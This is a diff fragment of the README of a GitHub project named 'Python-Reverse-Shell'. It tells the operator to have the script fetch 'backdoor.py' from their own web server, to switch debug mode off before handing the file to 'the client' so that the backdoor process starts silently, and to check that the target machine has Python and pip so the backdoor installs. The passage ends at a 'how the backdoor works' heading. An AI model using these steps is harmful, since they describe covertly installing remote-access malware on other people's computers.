ofer026/Python-Reverse-Shell/README.md

 `request = requests.get("%YOUR WEB SERVER ADDRESS%/backdoor.py")`

-Alse make sure that you change `debug = True` to `debug = False` when you give to the file to the client, or else, if the request won't work, messages will be displayed (on the console)
+Alse make sure that you change `debug = True` to `debug = False` when you give to the file to the client, or else, the backdoor process won't be created, and if the request won't work, messages will be displayed (on the console)

 Make sure that the target computer have python 3 installed and pip or else the backdoor won't be installed.
 ## how the backdoor works